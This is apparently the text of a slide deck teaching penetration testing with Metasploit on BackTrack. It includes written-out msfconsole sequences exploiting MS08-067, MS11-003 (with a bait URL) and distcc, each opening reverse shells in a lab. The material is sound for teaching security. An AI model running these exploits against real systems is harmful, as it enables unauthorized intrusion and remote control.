Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
Agenda
Why & Whats Penetration Testing ( Pentest ) << back|track Overview Metasploit Basic & Meterpreter DEMO :)
Why Do a Pentest
Millions of dollars investment in security A Penetration Test is one of the most
effective ways to identify systemic weaknesses and deciencies in these programs *1) program to protect critical infrastructures , prevent data breaches *1)
A method to evaluate the security of computer system / network Practice ( attacking ) an IT System like a hacker do
Find a security holes ( systemic weaknesses ) By pass security mechanism compromise an Organizations IT System Security
Ethics
Think before Act Dont be Stupid Dont be malicious
Pentest Phase
Reporting Post Exploitation Exploitation Vulnerability Analysis Information Gathering
Whats
Not just a tool, but an entire framework *1) an Open source platform for writing
security tools and exploits *2) exploits, payloads, encoders,
Easily build attack vectors to add its Create and execute more advanced attack Ruby based
Sunday, April 29, 12
Metasploit interfaces
MSFconsole MSFcli msfweb, msfgui ( discontinued ) Metasploit Pro, Metasploit Express Armitage
Sunday, April 29, 12
MSFconsole
MSFcli
Metasploit Terminology
Exploit : code that allow a pentester take some advantages of a aw within system,application, or service *1) Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) Shellcode : a set of instructions used as payload when exploitation occurs *1) Module : a software that can be used by metasploit *1) Listener : a component for waiting an incoming connection *1)
attacker
vulnerable server
Meterpreter
Meterpreter
Exploiting a vulnerability meterpreter shell Select a meterpreter as a payload
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Pentest Scenario
OS in the Lab
BackTrack 5 R 2
IP address : 172.16.240.143
Windows XP Exploitation
msf > search windows/smb msf > info exploit/windows/smb/ms08_067_netapi msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > exploit meterpreter > background session -l
Windows 7 Exploitation
msf > use exploit/windows/browser/ms11_003_ie_css_import msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms11_003_ie_css_import) > show options msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 msf exploit(ms11_003_ie_css_import) > set LPORT 443 msf exploit(ms11_003_ie_css_import) > exploit
Windows 7 Exploitation
msf exploit(ms11_003_ie_css_import) > sessions -l msf exploit(ms11_003_ie_css_import) > sessions -i 1 meterpreter > sysinfo meterpreter > shell
Sunday, April 29, 12
search distcc use exploit/unix/misc/distcc_exec show payloads set PAYLOAD cmd/unix/reverse show options set rhost 172.16.240.144 set lhost 172.16.240.143 exploit
Any Question ?
Contact me
References
Sunday, April 29, 12
1. Metasploit The Penetration Testers Guide : David Kennedy , Jim OGorman, Devon Kearns, Mati Aharoni 2. http://www.metasploit.com 3. http://www.offensive-security.com/metasploitunleashed/Main_Page 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines